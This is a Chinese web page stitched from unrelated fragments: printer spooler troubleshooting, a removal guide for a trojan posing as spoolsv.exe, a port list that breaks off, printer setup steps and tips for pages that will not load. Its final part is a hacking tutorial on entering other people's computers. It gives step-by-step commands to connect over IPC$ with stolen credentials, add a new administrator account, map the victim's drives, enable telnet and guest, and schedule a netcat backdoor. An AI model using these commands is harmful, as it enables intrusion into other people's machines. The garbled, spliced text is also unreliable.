大家知道,打印机打印文件,都是先把文件装载至系统内存的。然后再一个个的打印。所以,假如当系统内存满了的时候,打印文件就不会存在内存里,而打印机当然也不会正常打印了!
开头了~接下来该解决问题了。
进入电脑,发觉,系统运行太慢了,几乎处于假死状态,赶紧打开系统管理器,发觉CPU使用100%,查看了下,发觉是spoolsvexe这个进程使用了资源。
这里一定要说下什么是spoolsvexe了,这个东东是个系统进程,主要用于缓存打印文件的。spoolsvexe的运行占用CPU 100%的情况很可能是中了木马。
不过,说个题外话,这个系统装了卡巴斯基这个牛哄哄的杀毒软件,按常理来说,应该不会中什么木马病毒的。事实也证明,我的想法是正确的。当然,这是后话了。
为了安全起见,我还是先把网断了,开动ewido anti-spyware专杀木马的软件,扫除了一番,没发觉木马病毒,
然后到windows\system32下,也没发觉病毒喜欢开的spoolsv的文件夹,在启动项里面也没发觉spoolsvexe的启动进程。而且,注册表项也很正常。由此,我初步判断,应该不是系统造成的。再看下系统信息,内存只有256M,而用户这台电脑运行十分缓慢,后台的进程很多(足有40余项),系统也没有优化,打开一个窗口都要等上一顿茶的工夫。由此可知,打印机延迟打印的原因是内存不足造成的。
为了解决问题,赶紧把这个电脑进行了一番优化,该删的删,不该删的也删。几顿茶的工夫,终于搞定了。再打印几张纸,一切正常~~~~
顺便描述下什么是spoolsvexe病毒了。由于偶喜欢偷懒,就贴上来吧。~!~~~
病毒spoolsvexe的查杀
关键词: spoolsvexe
正常的spoolsvexe大小是57k,用于将Windows打印机任务发送给本地打印机。如果spoolsvexe大小为44k则是BackdoorCiadoorB木马,藏于c:\windows\system32\spoolsv文件夹,为防被删还设置有备份程序tqppmtwfyf藏于windows32文件夹。该木马允许攻击者访问你的计算机,窃取密码和个人数据。
关于病毒:
启动项 c:/windows/system32/spoolsv/spoolsvexe -printer
相关文件、目录:
%System%\wmpdrmdll
%System%\1116\
%System%\msicn\msibmdll
%System%\msicn\ubeexe
%System%\msicn\plugins\
%System%\spoolsv\spoolsvexe
%System%\spoolsv\spoolsvexe
启动运行后会调用%System%\msicn\msibmdll,创建%System%\1116\目录,备份用。%System%\1116\目录是备份目录,里面是%System%\wmpdrmdll、%System%\msicn\和%System%\spoolsv\spoolsvexe的备份。 %System%\msicn\msibmdll会插入多个指定进程,大约每4秒钟监视恢复文件(从%System%\1116\目录)和注册表信息(启动项、BHO):[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]"spoolsv"[HKEY_CLASSES_ROOT\CLSID\{0E674588-66B7-4E19-9D0E-2053B800F69F}\InprocServer32] @="%System%\wmpdrmdll" 注:"spoolsv"的数据不会被监视,所以修改它的数据也不会被恢复,只有删除"spoolsv"才会被恢复。
还可能会从远程服务器下载文件:h ttp://liveupdateourxincom/secpexe
secpexe是个安装程序,安装以下文件:
%System%\wmpdrmdll
%System%\msicn\ubeexe
%System%\msicn\plugins\(目录里4个dll文件)
%System%\wmpdrmdll是一个BHO,%System%\msicn\ubeexe像是卸载程序。
另外,在%System%\和%System%\msicn\目录里还有有一些从远程下载来的cpz、vxd文件,比如: avavxd guidvxd plgsetvxd safepvxd
%System%\wmpdrmdll作为BHO被调用后,会尝试调用%System%\spoolsv\spoolsvexe和%System%\msicn\msibmdll。注:如果%System%\spoolsv\spoolsvexe没有被运行或被调用,也就不会备份还原,好像它就是用来备份的。
另外在“开始菜单”->“程序”里可能会有一项“NavAngel”,里面有个快捷方式NavAngellnk,指向:%System%\spoolsv\spoolsvexe -ctrlfun:4,3 “添加/删除程序”里有一项“NavAngel”,对应命令是:%System%\spoolsv\spoolsvexe -ctrlfun:4,2 还有一项“WinDirected 20”,对应命令是:%System%\spoolsv\spoolsvexe -uninst
还可能会有mscache\目录,从名字看像是存放临时缓存文件的。
要注意:spoolsvexe和windows的打印服务spoolsvexe很类似,不要被它迷惑了,打印服务spoolsvexe的目录是系统文件夹(以XP为例)system32\spoolsvexe而此病毒的路径为system32\spoolsv\sploosvexe
查杀方法:
第一种:
1、在安全模式下进入系统目录system32删除文件夹spoolsv和miscn以及1116
2、开始菜单运行regedit打开注册表编辑器,找到
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"spoolsv"="%System%\spoolsv\spoolsvexe-printer" 删除该项
3、在注册表中搜索spoolsv文件夹(注意是文件夹不是文件),删除
4、在注册表编辑器中打开下面的分支并使用组合键ctrl+f进行查找如下内容:
[HKEY_CLASSES_ROOT\CLSID\{0E674588-66B7-4E19-9D0E-2053B800F69F}
[HKEY_CLASSES_ROOT\wmpdrmcfsbho
[HKEY_CLASSES_ROOT\wmpdrmcfsbho1
[HKEY_CLASSES_ROOT\TypeLib\{8B200623-3FC5-4493-8B49-DC2AD4830AF4}
[HKEY_CLASSES_ROOT\Interface\{4A775183-9517-420E-9A13-D3DA47BB8A84}找到以后进行删除
5、运行注册表清里软件清理注册表,比如超级兔子,优化大师,恶意软件清理助手等都可以,此步骤也可以不执行。
第二种:
在桌面建一个TXT文件并显示扩展名,改名为spoolsexe后将文件属性改为只读,将这个假的病毒覆盖c:\winnt\system32\spoolsv\的44K真病毒。这种虽然方便但是遗留隐患。
第三种:
首先删除c:\windows\system32\spoolsv文件夹,而非单独删除c:\windows\system32\spoolsv下的spoolsvexe(44k)文件,然后打开任务管理器,将spoolsv进程优先级调为最低;最后迅速删除其备份文件tqppmtwfyf并关闭spoolsv进程即可。1 传输控制协议端口服务多路开关选择器
2 compressnet 管理实用程序
3 压缩进程
5 远程作业登录
7 回显(Echo)
9 丢弃
11 在线用户
12 我的测试端口
13 时间
15 netstat
17 每日引用
18 消息发送协议
19 字符发生器
20 文件传输协议(默认数据口)
21 文件传输协议(控制)
22 SSH远程登录协议
23 telnet 终端仿真协议
24 预留给个人用邮件系统
25 smtp 简单邮件发送协议
27 NSW 用户系统现场工程师
29 MSG ICP
31 MSG验证
33 显示支持协议
35 预留给个人打印机服务
37 时间
38 路由访问协议
39 资源定位协议
41 图形
42 WINS 主机名服务
43 "绰号" who is服务
44 MPM(消息处理模块)标志协议
45 消息处理模块
46 消息处理模块(默认发送口)
47 NI FTP
48 数码音频后台服务
49 TACACS登录主机协议
50 远程邮件检查协议
51 IMP(接口信息处理机)逻辑地址维
52 施乐网络服务系统时间协议
53 域名服务器
54 施乐网络服务系统票据交换
55 ISI图形语言
56 施乐网络服务系统验证
57 预留个人用终端访问
58 施乐网络服务系统邮件
59 预留个人文件服务
60 未定义
61 NI邮件
62 异步通讯适配器服务
63 WHOIS+
64 通讯接口
65 TACACS数据库服务
66 Oracle SQLNET
67 引导程序协议服务端
68 引导程序协议客户端
69 小型文件传输协议
70 信息检索协议
71 远程作业服务
72 远程作业服务
73 远程作业服务
74 远程作业服务
75 预留给个人拨出服务
76 分布式外部对象存储
77 预留给个人远程作业输入服务
78 修正TCP
79 Finger(查询远程主机在线用户等信息)
80 全球信息网超文本传输协议( >1开始--控制面板--添加打印机
2下一步,(如果打印机在你本机,你选择此计算机连本地打印机,之后点下一步
3选择打印机插孔,一般的usb和ltp1,插口,正常你的这个是ltp插口的
,选择完毕你点下一步
4点下一步,在出现一个对话框,在厂商那里找型号。这个是windows自带的
5下一步,下一步,完成
6插上打印机,通电,自动检测,可以用了网页打不开的解决办法:
1电脑遭到恶意病毒入侵,如上文所述,许多网民都去下载文件,该类文件其实都带有恶意病毒,一旦运行都会出现网页打不开现象。
2DNS设置错误,需要修改DNS设置。
3浏览器设置代理服务器选项,所以出现打不开网页情况。
4系统垃圾和网页痕迹较多,没有做定期清理。
使用百度安全卫士和百度杀毒系统清理功能和系统修复功能,即可解决该类问题。如何进入别人的电脑- -
大学时在参加ACCP的电脑编程课程,只是兴趣而已,并没有多么的用心学,对一些乱七八糟的东西比较感兴趣,那时做的最多的就是尝试进入别人的电脑和服务器
1、取得对方IP地址如XXXXXXXX,方法太多不细讲了。
2判断对方上网的地点,开个DOS窗口键入 TRACERT XXXXXXXX 第4和第5行反映的信息既是对方的上网地点。
3得到对方电脑的名称,开个DOS窗口键入 NBTSTAT -A XXXXXXXX 第一行是对方电脑名称 第二行是对方电脑所在工作组 第三行是对方电脑的说明
4在Windows目录下有一文件名为LMHOSTSSAM,将其改名为LMHOSTS,删除其内容,将对方的IP及电脑名按以下格式写入文件: XXXXXXXX 电脑名
5开DOS窗口键入 NBTSTAT -R 6在开始-查找-电脑中输入对方电脑名,出现对方电脑点击即可进入
黑客命令之1:NET
只要你拥有某IP的用户名和密码,那就用IPC$做连接吧!
这里我们假如你得到的用户是hbx,密码是123456。假设对方IP为
127001
net use \\127001\ipc$ "123456" /user:"hbx"
退出的命令是
net use \\127001\ipc$ /delte
下面的作你必须登陆后才可以用登陆的方法就在上面
----------------------
下面我们讲怎么创建一个用户,由于SA的权限相当于系统的超级用
户
我们加一个heibai的用户密码为lovechina
net user heibai lovechina /add
只要显示命令成功,那么我们可以把他加入Administrator组了
net localgroup Administrators heibai /add
----------------------
这里是讲映射对方的C盘,当然其他盘也可以,只要存在就行了我们这
里把对方的C盘映射到本地的Z盘
net use z:\\127001\c$
----------------------
net start telnet
这样可以打开对方的TELNET服务
----------------------
这里是将Guest用户激活,guest是NT的默认用户,而且无法删除呢?
不知道是否这样,我的2000就是删除不了它。
net user guest /active:yes
----------------------
这里是把一个用户的密码改掉,我们把guest的密码改为lovechina,
其他用户也可以的。只要有权限就行了呀!
net user guest lovechina
黑客命令之2:at
一般一个入侵者入侵后都会留下后门,也就是种木马了,你把木马传了上去,怎么启动他呢?
那么需要用AT命令,这里假设你已经登陆了那个服务器。
你首先要得到对方的时间,
net time \\127001
将会返回一个时间,这里假设时间为12:1,现在需要新建一个作业,其ID=1
at \\127001 12:3 ncexe
这里假设了一个木马,名为NCEXE,这个东西要在对方服务器上
这里介绍一下NC,NC是NETCAT的简称,为了方便输入,一般会被改名它
是一个TELNET服务,端口为99
等到了12:3就可以连接到对方的99端口这样就给对方种下了木马
黑客命令之3:telnet
这个命令非常实用,它可以与远方做连接,不过正常下需要密码、用
户,不过你给对方种了木马,直接连到这个木马打开的端口
telnet 127001 99
这样就可以连到对方的99端口那你就可以在对方运行命令了,这个也
就是肉鸡
黑客命令之4:FTP
它可以将你的东西传到对方机子上,你可以去申请个支持FTP上传的空
间,国内多的是,如果真的找不到,我给个>
欢迎分享,转载请注明来源:内存溢出
微信扫一扫
支付宝扫一扫
评论列表(0条)